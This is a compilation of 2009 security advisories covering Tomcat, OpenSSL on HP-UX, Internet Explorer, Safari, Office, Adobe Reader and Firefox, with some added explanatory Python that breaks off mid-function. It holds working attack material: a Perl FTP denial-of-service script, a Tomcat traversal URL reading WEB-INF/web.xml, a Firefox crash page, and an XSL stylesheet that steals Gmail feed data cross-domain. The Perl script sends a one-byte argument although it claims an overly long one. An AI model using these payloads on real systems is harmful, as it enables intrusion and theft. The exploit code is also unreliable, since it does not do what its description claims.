1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the
RELENG_7_2, RELENG_7_1, RELENG_6_4, or RELENG_6_3 security branch
dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.3, 6.4,
7.1, and 7.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-09:09/pipe.patch
# fetch http://security.FreeBSD.org/patches/SA-09:09/pipe.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

CVS:

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_6
  src/sys/kern/sys_pipe.c                                        1.184.2.5
RELENG_6_4
  src/UPDATING                                                1.416.2.40.2.9
  src/sys/conf/newvers.sh                                     1.69.2.18.2.11
  src/sys/kern/sys_pipe.c                                    1.184.2.4.2.2
RELENG_6_3
  src/UPDATING                                               1.416.2.37.2.16
  src/sys/conf/newvers.sh                                     1.69.2.15.2.15
  src/sys/kern/sys_pipe.c                                    1.184.2.2.6.2
RELENG_7
  src/sys/kern/sys_pipe.c                                        1.191.2.5
RELENG_7_2
  src/UPDATING                                                1.507.2.23.2.4
  src/sys/conf/newvers.sh                                      1.72.2.11.2.5
  src/sys/kern/sys_pipe.c                                    1.191.2.3.4.2
RELENG_7_1
  src/UPDATING                                                1.507.2.13.2.9
  src/sys/conf/newvers.sh                                      1.72.2.9.2.10
  src/sys/kern/sys_pipe.c                                    1.191.2.3.2.2
- -------------------------------------------------------------------------

Subversion:

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/6/
[SECURITY] UPDATED CVE-2008-5515 RequestDispatcher directory traversal vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Updated to add additional patches required for 5.5.x and 4.1.x

CVE-2008-5515: Apache Tomcat information disclosure vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Tomcat 4.1.0 to 4.1.39
Tomcat 5.5.0 to 5.5.27
Tomcat 6.0.0 to 6.0.18
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may also be affected

Description:
When using a RequestDispatcher obtained from the Request, the target path
was normalised before the query string was removed. A request that
included a specially crafted request parameter could be used to access
content that would otherwise be protected by a security constraint or by
being located under the WEB-INF directory.

Mitigation:
6.0.x users should upgrade to 6.0.20 or apply this patch:
http://svn.apache.org/viewvc?view=rev&revision=734734
5.5.x users should upgrade to 5.5.28 when released or apply these patches:
http://svn.apache.org/viewvc?view=rev&revision=782757
http://svn.apache.org/viewvc?view=rev&revision=783291
4.1.x users should upgrade to 4.1.40 when released or apply these patches:
http://svn.apache.org/viewvc?view=rev&revision=782763
http://svn.apache.org/viewvc?view=rev&revision=783292

Example:
For a page that contains:

<%
request.getRequestDispatcher("bar.jsp?somepar=someval&par=" + request.getParameter("blah")).forward(request, response);
%>

an attacker can use:

http://host/page.jsp?blah=/../WEB-INF/web.xml

Credit:
This issue was discovered by Iida Minehiko, Fujitsu Limited

References:
http://tomcat.apache.org/security.html

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkovmMwACgkQb7IeiTPGAkNPigCcDBEKxwuBoXnvixbqoqM8CIaN
VKYAni4kHySG2JmbYi1hz4xAGpgm36Gr
=7FT9
-----END PGP SIGNATURE-----
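The ordering bug in the description is worth seeing step by step: when the whole dispatcher string is normalised first, the '..' that arrives inside a parameter value is treated as a path segment and swallows 'bar.jsp?...', and only afterwards does the container look for a query string that is no longer there. The Python below is an added example, not Tomcat code; its path handling is a simplified stand-in for the container's, it uses the page path and attack value from the advisory, and the two orderings it compares are the vulnerable one (normalise, then strip the query) and the fixed one (strip the query, then normalise).

```python
"""Model of the CVE-2008-5515 ordering bug in RequestDispatcher path handling.

Added example, not Tomcat code. posixpath.normpath stands in for the
container's normalisation; the calling page and attack parameter are the
ones from the advisory.
"""
import posixpath

PAGE_PATH = "/page.jsp"            # the page from the advisory example
ATTACK_VALUE = "/../WEB-INF/web.xml"


def build_dispatcher_target(blah: str) -> str:
    """What the advisory's JSP passes to request.getRequestDispatcher()."""
    return "bar.jsp?somepar=someval&par=" + blah


def split_query(target: str):
    """'p?q' -> ('p', 'q'); the query is None when there is none."""
    path, sep, query = target.partition("?")
    return path, (query if sep else None)


def resolve_target(page_path: str, target: str, strip_query_first: bool):
    """Resolve a dispatcher target relative to the calling page.

    strip_query_first=False reproduces the vulnerable order (normalise the
    whole string, then split off the query); True reproduces the fixed order.
    Returns (servlet_path, query_string).
    """
    if not target.startswith("/"):
        target = posixpath.join(posixpath.dirname(page_path), target)
    if strip_query_first:
        path, query = split_query(target)
        path = posixpath.normpath(path)
    else:
        # Vulnerable: '..' inside the query consumes the 'bar.jsp?...' segment.
        path, query = split_query(posixpath.normpath(target))
    return path, query


def is_protected(servlet_path: str) -> bool:
    """Servlet containers must never serve WEB-INF or META-INF contents."""
    upper = servlet_path.upper()
    return upper.startswith("/WEB-INF/") or upper.startswith("/META-INF/")


def forward_allowed(page_path: str, blah: str, strip_query_first: bool) -> bool:
    """False when the resolved target would expose protected content."""
    path, _ = resolve_target(page_path, build_dispatcher_target(blah), strip_query_first)
    return not is_protected(path)


if __name__ == "__main__":
    target = build_dispatcher_target(ATTACK_VALUE)
    print("vulnerable order:", resolve_target(PAGE_PATH, target, strip_query_first=False))
    print("fixed order:     ", resolve_target(PAGE_PATH, target, strip_query_first=True))
```

With the vulnerable order the request resolves to '/WEB-INF/web.xml' with no query string at all; with the fixed order it resolves to '/bar.jsp' and the attacker's value stays where it belongs, in the 'par' parameter. A benign value such as 'hello' resolves identically under both orders, which is why the bug went unnoticed in normal use.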
[security bulletin] HPSBUX02435 SSRT090059 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Bypass Security Restrictions
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01762423
Version: 1

HPSBUX02435 SSRT090059 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Bypass Security Restrictions

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-06-09
Last Updated: 2009-06-09

Potential Security Impact: Remote Denial of Service (DoS), bypass security restrictions

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running OpenSSL. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS) and bypass security restrictions.

References: CVE-2009-0590, CVE-2009-0591, CVE-2009-0789

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2009-0590    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0
CVE-2009-0591    (AV:N/AC:H/Au:N/C:N/I:P/A:N)       2.6
CVE-2009-0789    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION
HP has provided the following updates to resolve these vulnerabilities. The updates are available from the following location:

URL: http://software.hp.com

HP-UX Release       HP-UX OpenSSL version
B.11.11 (11i v1)    A.00.09.07m.049
B.11.23 (11i v2)    A.00.09.07m.050
B.11.31 (11i v3)    A.00.09.08k.003

MANUAL ACTIONS: Yes - Update

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.11
===========
fips_1_1_2.FIPS-CONF
fips_1_1_2.FIPS-DOC
fips_1_1_2.FIPS-INC
fips_1_1_2.FIPS-LIB
fips_1_1_2.FIPS-MAN
fips_1_1_2.FIPS-MIS
fips_1_1_2.FIPS-RUN
fips_1_1_2.FIPS-SRC
action: install revision FIPS-OPENSSL-1.1.2.049 or subsequent

fips_1_2.FIPS-CONF
fips_1_2.FIPS-DOC
fips_1_2.FIPS-INC
fips_1_2.FIPS-LIB
fips_1_2.FIPS-MAN
fips_1_2.FIPS-MIS
fips_1_2.FIPS-RUN
fips_1_2.FIPS-SRC
action: install revision FIPS-OPENSSL-1.2.001 or subsequent

openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.07m.049 or subsequent
URL: http://software.hp.com

HP-UX B.11.23
===========
fips_1_1_2.FIPS-CONF
fips_1_1_2.FIPS-DOC
fips_1_1_2.FIPS-INC
fips_1_1_2.FIPS-LIB
fips_1_1_2.FIPS-MAN
fips_1_1_2.FIPS-MIS
fips_1_1_2.FIPS-RUN
fips_1_1_2.FIPS-SRC
action: install revision FIPS-OPENSSL-1.1.2.050 or subsequent

fips_1_2.FIPS-CONF
fips_1_2.FIPS-DOC
fips_1_2.FIPS-INC
fips_1_2.FIPS-LIB
fips_1_2.FIPS-MAN
fips_1_2.FIPS-MIS
fips_1_2.FIPS-RUN
fips_1_2.FIPS-SRC
action: install revision FIPS-OPENSSL-1.2.002 or subsequent

openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.07m.050 or subsequent
URL: http://software.hp.com

HP-UX B.11.31
===========
fips_1_1_2.FIPS-CONF
fips_1_1_2.FIPS-DOC
fips_1_1_2.FIPS-INC
fips_1_1_2.FIPS-LIB
fips_1_1_2.FIPS-MAN
fips_1_1_2.FIPS-MIS
fips_1_1_2.FIPS-RUN
fips_1_1_2.FIPS-SRC
action: install revision FIPS-OPENSSL-1.1.2.051 or subsequent

fips_1_2.FIPS-CONF
fips_1_2.FIPS-DOC
fips_1_2.FIPS-INC
fips_1_2.FIPS-LIB
fips_1_2.FIPS-MAN
fips_1_2.FIPS-MIS
fips_1_2.FIPS-RUN
fips_1_2.FIPS-SRC
action: install revision FIPS-OPENSSL-1.2.003 or subsequent

openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.08k.003 or subsequent
URL: http://software.hp.com

END AFFECTED VERSIONS

HISTORY
Version: 1 (rev.1) - 9 June 2009 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To
FortiGuard Advisory: Microsoft Internet Explorer DHTML Handling Remote Memory Corruption Vulnerability
Microsoft Internet Explorer DHTML Handling Remote Memory Corruption Vulnerability
2009.June.09

Fortinet's FortiGuard Global Security Research Team Discovers Memory Corruption Vulnerability in Microsoft's Internet Explorer.

Summary:
A memory corruption vulnerability exists in the DHTML handling of Microsoft's Internet Explorer which allows a remote attacker to compromise a system through a malicious site.

Impact:
Remote Code Execution.

Risk:
Critical

Affected Software:
For a list of operating system and product versions affected, please see the Microsoft Bulletin reference below.

Additional Information:
The vulnerability occurs when Internet Explorer processes special DHTML functions. A crash may happen when destroying a window after making a sequence of calls on the tr element. These calls are linked to the insertion, deletion and attributes of a table cell. The crash may then allow the arbitrary execution of code on the browser's machine.

Solutions:
Use the solution provided by Microsoft (MS09-019).

The FortiGuard Global Security Research Team released a signature MS.IE.DHTML.Function.Remote.Code.Execution, which covers this specific vulnerability. Fortinet customers who subscribe to Fortinet's intrusion prevention (IPS) service should be protected against this memory corruption vulnerability. Fortinet's IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus, Web content filtering and antispam capabilities. These services enable protection against threats on both application and network layers. FortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a combination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are delivered to all FortiGate, FortiMail and FortiClient products. Fortinet strictly follows responsible disclosure guidelines to ensure optimum protection during a threat's lifecycle.

References:
FortiGuard Advisory: http://www.fortiguardcenter.com/advisory/FGA-2009-22.html
Microsoft Bulletin: http://www.microsoft.com/technet/security/bulletin/ms09-019.mspx
CVE ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1141

Acknowledgement:
Haifei Li of Fortinet's FortiGuard Global Security Research Team
ZDI-09-038: Microsoft Internet Explorer Event Handler Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-038
June 10, 2009

-- CVE ID:
CVE-2009-1530

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists when repeatedly calling event handlers after adding nodes of an HTML document. When a specially crafted webpage is repeatedly rendered, memory is improperly reused after it has been freed. Due to the controllable nature of the web browser, this vulnerability can be exploited to remotely compromise a system running under the security context of the currently logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx

-- Disclosure Timeline:
2009-01-26 - Vulnerability reported to vendor
2009-06-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* ling wushi of team509

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
ZDI-09-041: Microsoft Internet Explorer 8 Rows Property Dangling Pointer Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-041
June 10, 2009

-- CVE ID:
CVE-2009-1532

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer 8. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists during the rendering of an HTML page with malformed row property references, resulting in a dangling pointer which can be abused to execute arbitrary code. Internet Explorer 7 is not affected.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx

-- Disclosure Timeline:
2009-03-19 - Vulnerability reported to vendor
2009-06-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Nils
FortiGuard Advisory: Apple Safari Remote Memory Corruption Vulnerability
Apple Safari Remote Memory Corruption Vulnerability
2009.June.09

Fortinet's FortiGuard Global Security Research Team Discovers Vulnerability in Apple Safari.

Summary:
A memory corruption vulnerability exists in Apple Safari which allows a remote attacker to execute arbitrary code through a malicious webpage.

Impact:
Remote Code Execution.

Risk:
Critical

Affected Software:
For a list of product versions affected, please see the Apple Security Update reference below.

Additional Information:
The memory corruption vulnerability occurs when handling HTML table elements. A remote attacker may craft a malicious webpage and lure an unsuspecting user. When the page is viewed and these elements are processed, arbitrary code execution may occur, resulting in the victim's machine being compromised.

Solutions:
Apple security updates are available via their Software Update mechanism. Apple security updates are available for manual download here.

The FortiGuard Global Security Research Team released a signature DHTML.Malicious.Table.Elements, which covers this specific vulnerability. Fortinet customers who subscribe to Fortinet's intrusion prevention (IPS) service should be protected against this memory corruption vulnerability.

References:
FortiGuard Advisory: http://www.fortiguardcenter.com/advisory/FGA-2009-23.html
Apple Security Updates for Safari 4.0: http://support.apple.com/kb/HT3613
Apple Security Updates for iPhone: http://support.apple.com/kb/HT3318
CVE ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4231

Acknowledgement:
Haifei Li of Fortinet's FortiGuard Global Security Research Team
ZDI-09-035: Microsoft Word Document Stack Based Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-035
June 10, 2009

-- CVE ID:
CVE-2009-0563

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office Word

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page, open a malicious e-mail, or open a malicious file.

The specific flaw exists within the parsing of vulnerable tags inside a Microsoft Word document. Microsoft Word trusts a length field read from the file which is used to read file contents into a buffer allocated on the stack. When an invalid length is present, a stack based buffer overflow occurs, resulting in the ability to execute arbitrary code.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx

-- Disclosure Timeline:
2008-07-08 - Vulnerability reported to vendor
2009-06-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* ling wushi of team509
XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit
#!/usr/bin/perl -w
###
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
# via a HELP or TYPE command with an overly long argument.
# Refer:
# http://secunia.com/advisories/35271/
# Original advisory available at: http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/
# Product link: http://www.dxm2008.com/
#
# $This was strictly written for educational purpose. Use it at your own risk.$$
# $Author will not bear any responsibility for any damages whatsoever.$$
#
# Author: Vinod Sharma
# Email: vinodsharma[underscore]mimit[at]gmail.com
# Blog: http://securitygyan.com/
# Date: 09th June, 2009
#
###Thanks all the Security Folks###

use IO::Socket;

# Argument check first, so a missing argument prints usage instead of an undef warning.
if (($#ARGV + 1) != 5) {
    print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";
    print "\nargument command can have a value HELP or TYPE\n";
    print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP\n";
    exit;
}

my $server_ip   = $ARGV[0];
my $server_port = $ARGV[1];
my $username    = $ARGV[2];
my $password    = $ARGV[3];
my $command     = $ARGV[4];

# The FTP command (HELP or TYPE) followed by its argument and the CRLF terminator.
my $buffer = $command . " " . "\x41" x 1 . "\r\n";

my $socket = new IO::Socket::INET(
    PeerAddr => $server_ip,
    PeerPort => $server_port,
    Proto    => 'tcp',
) or die "Couldn't connect to Server\n";

my ($recv_data, $recv_data1, $recv_data2, $recv_data3);

# Read the server banner, then log in with USER/PASS.
$socket->recv($recv_data, 1024);
print "RECEIVED: $recv_data";

my $send_data1 = "USER " . $username . "\r\n";
$socket->send($send_data1);
$socket->recv($recv_data1, 1024);
print "RECEIVED: $recv_data1";

my $send_data2 = "PASS " . $password . "\r\n";
$socket->send($send_data2);
$socket->recv($recv_data2, 1024);
print "RECEIVED: $recv_data2";

# Send the command with the crafted argument once and report the reply (if any).
$socket->send($buffer);
print "\nAttack is sent.\n";
$socket->recv($recv_data3, 1024);
print "RECEIVED: $recv_data3";

close $socket;
[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services
ECHO_ADV_110$2009

[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services

Author       : Ahmad Muammar W.K (a.k.a) y3dips
Date Found   : June, 4th 2009
Location     : Indonesia, Jakarta
web          : http://e-rdc.org/v1/news.php?readmore=137
Critical Lvl : Moderated
Impact       : Browser will automatically shutdown
Where        : From Remote

Disclosure Policy: Full Disclosure Policy (RFPolicy) v2.0
http://www.wiretrip.net/rfp/policy.html

Affected software description:
~~
Firefox is a popular Internet browser from the Mozilla Corporation.

Application    : Firefox for GNU/Linux
version        : Firefox/3.0.10 (X11; Linux i686; U; en)
                 Also affected for lower versions (tested for version 3.0.8 at Ubuntu 9.0.4)
URL            : http://firefox.com
Bugzilla entry : https://bugzilla.mozilla.org/show_bug.cgi?id=496265

Description:
Firefox 3.0.10 (and previous versions) for GNU/Linux operating systems is unable to handle rendering of big-size GIF images when they become a body background. Just using a random-size GIF file will crash Firefox because of the HTML body tag.

Exploit Code:

<!-- Firefox 3.0.10 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3dips.echo.or.id //-->
<html>
<head>
<title>Firefox Exploit</title>
</head>
<body background="exploit.gif">
</body>
</html>

live exploit : http://y3dips.echo.or.id/tempe/ff310expl/

Timeline:
~
- 20-05-2009 bug found
- 04-06-2009 vendor contacted and adding entry to bugzilla
- 04-06-2009 vendor response, and there's a potential patch
- 09-06-2009 advisory release

Shoutz:
~~~
~ my family (ana my wife and ali my son)
~ the_day, K-159, negative, hero, az001, rey, and also all echo staff
~ janex vind waraxe, str0ke, chopstick
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net

Contact: y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
Homepage: http://y3dips.echo.or.id/
Secunia Research: Microsoft PowerPoint Freelance Layout Parsing Vulnerability
==
Secunia Research 10/06/2009

- Microsoft PowerPoint Freelance Layout Parsing Vulnerability -
==

Table of Contents

Affected Software ................... 1
Severity ............................ 2
Vendor's Description of Software .... 3
Description of Vulnerability ........ 4
Solution ............................ 5
Time Table .......................... 6
Credits ............................. 7
References .......................... 8
About Secunia ....................... 9
Verification ....................... 10

==
1) Affected Software

* Microsoft Office PowerPoint 2000
* Microsoft Office PowerPoint 2002

NOTE: Other versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: System compromise
Where: Remote

==
3) Vendor's Description of Software

Microsoft Office PowerPoint 2007 enables users to quickly create high-impact, dynamic presentations, while integrating workflow and ways to easily share information. From the Microsoft Office Fluent user interface to the new graphics and formatting capabilities, Office PowerPoint 2007 puts the control in your hands to create great-looking presentations.

Product Link:
http://office.microsoft.com/powerpoint

==
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft PowerPoint, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused by an array-indexing error in the Microsoft PowerPoint Freelance Windows 2.1 Translator (FL21WIN.DLL) when parsing layout information and can be exploited to cause a heap-based buffer overflow.

Successful exploitation allows execution of arbitrary code.

NOTE: On systems with MS09-017 applied, support for Freelance files is disabled by default, but can be re-enabled via a key in the registry.

==
5) Solution

Microsoft states that no fix will be issued. However, installations with MS09-017 applied block opening of Freelance files by default.

Users having enabled Freelance file support should not open Freelance files from untrusted sources.

==
6) Time Table

22/05/2009 - Vendor notified.
23/05/2009 - Vendor response.
03/06/2009 - Vendor informs that no security bulletin will be issued as Freelance files are blocked by default after applying MS09-017.
04/06/2009 - Vendor informed that Secunia agrees that a new security bulletin is not required. It is, however, recommended to update MS09-017 to inform users that Freelance support has been disabled by default and should not be re-enabled as the translator is affected by a critical vulnerability.
10/06/2009 - Public disclosure.

==
7) Credits

Discovered by Carsten Eiram, Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0202 for the vulnerability.

==
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:
http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:
http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
Secunia Research: Adobe Reader JBIG2 Text Region Segment Buffer Overflow
==
Secunia Research 10/06/2009

- Adobe Reader JBIG2 Text Region Segment Buffer Overflow -
==

Table of Contents

Affected Software ................... 1
Severity ............................ 2
Vendor's Description of Software .... 3
Description of Vulnerability ........ 4
Solution ............................ 5
Time Table .......................... 6
Credits ............................. 7
References .......................... 8
About Secunia ....................... 9
Verification ....................... 10

==
1) Affected Software

* Adobe Reader 9.1.0

NOTE: Other versions may also be affected.

==
2) Severity

Rating: Highly critical
Impact: System access
Where: From remote

==
3) Vendor's Description of Software

Adobe Reader software is the global standard for electronic document sharing. It is the only PDF file viewer that can open and interact with all PDF documents.

Product Link:
http://www.adobe.com/products/reader/

==
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Adobe Reader, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in the processing of Huffman encoded JBIG2 text region segments. This can be exploited to cause a heap-based buffer overflow via a specially crafted PDF file.

Successful exploitation may allow execution of arbitrary code.

==
5) Solution

Update to version 9.1.2, 8.1.6, or 7.1.3.

==
6) Time Table

14/04/2009 - Vendor notified.
14/04/2009 - Vendor response.
10/06/2009 - Public disclosure.

==
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0198 for the vulnerability.

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-24/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==
Apple Safari cross-domain XML theft vulnerability
Hi,

Safari prior to version 4 may permit an evil web page to steal arbitrary XML data cross-domain. This is accomplished by abusing a relatively obscure cross-domain access point which was completely missing a cross-domain access check. The access point in question is the document() function in XSL.

This is best illustrated with a sample evil XSL file which abuses this function:

<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:str="http://exslt.org/strings"
  extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
<script>
alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?>
<xml>
irrelevant
</xml>

There are a number of interesting XML-based formats you might want to steal including authenticated RSS, XML-formatted AJAX-y responses, and XHTML.

Full technical details:
http://scary.beasts.org/security/CESA-2009-008.html

Blog post:
http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-also-fixes-cross-domain.html
(includes 1-click demo)

Cheers
Chris
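As an added example (not code from the post, from Safari or from WebKit), here is a stand-alone Python model of the same-origin check the post says document() was missing: a fetch is allowed only when the requested URL resolves to the stylesheet's own scheme, host and port, and every decision is recorded for logging. The hostnames and document contents below are constructed for the demonstration.

```python
"""Model of the cross-domain check that XSL document() lacked in Safari < 4.

Added example, not the post's, Safari's or WebKit's code. The stylesheet's
scheme, host and port are taken as the caller's origin; document() may fetch
a URL only if it resolves to that same origin. Hosts and documents are
constructed.
"""
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """Return (scheme, host, port) for a web URL, or None if it has no web origin.

    file:, data:, javascript: and malformed URLs return None, so they are never
    considered the same origin as anything.
    """
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    if port is None:
        port = DEFAULT_PORTS[scheme]  # https://h/ and https://h:443/ are one origin
    return (scheme, parts.hostname.lower(), port)


def document_fetch_allowed(stylesheet_url, requested):
    """Same-origin decision for document(requested) evaluated in stylesheet_url.

    Relative references are resolved against the stylesheet URL first, so
    document('data.xml') from https://app.example/s.xsl is allowed, while
    document('https://mail.example/feed/atom') from http://evil.example/ is not.
    """
    caller = origin_of(stylesheet_url)
    if caller is None:
        return False
    return origin_of(urljoin(stylesheet_url, requested)) == caller


# Constructed stand-in for what the network would return for each URL.
SAMPLE_WEB = {
    "https://mail.example/feed/atom": "<feed><entry><title>private mail</title></entry></feed>",
    "https://app.example/data.xml": "<data>public widget data</data>",
}


class XsltDocumentResolver:
    """What an XSLT engine's document() hook should do before fetching anything.

    Each decision is appended to `audit` as (verdict, stylesheet_url, target_url)
    so denied cross-origin attempts can be logged and alerted on.
    """

    def __init__(self, stylesheet_url, web=SAMPLE_WEB):
        self.stylesheet_url = stylesheet_url
        self.web = web
        self.audit = []

    def document(self, requested):
        """Return the fetched text, or None (an empty node-set) when denied."""
        url = urljoin(self.stylesheet_url, requested)
        if not document_fetch_allowed(self.stylesheet_url, requested):
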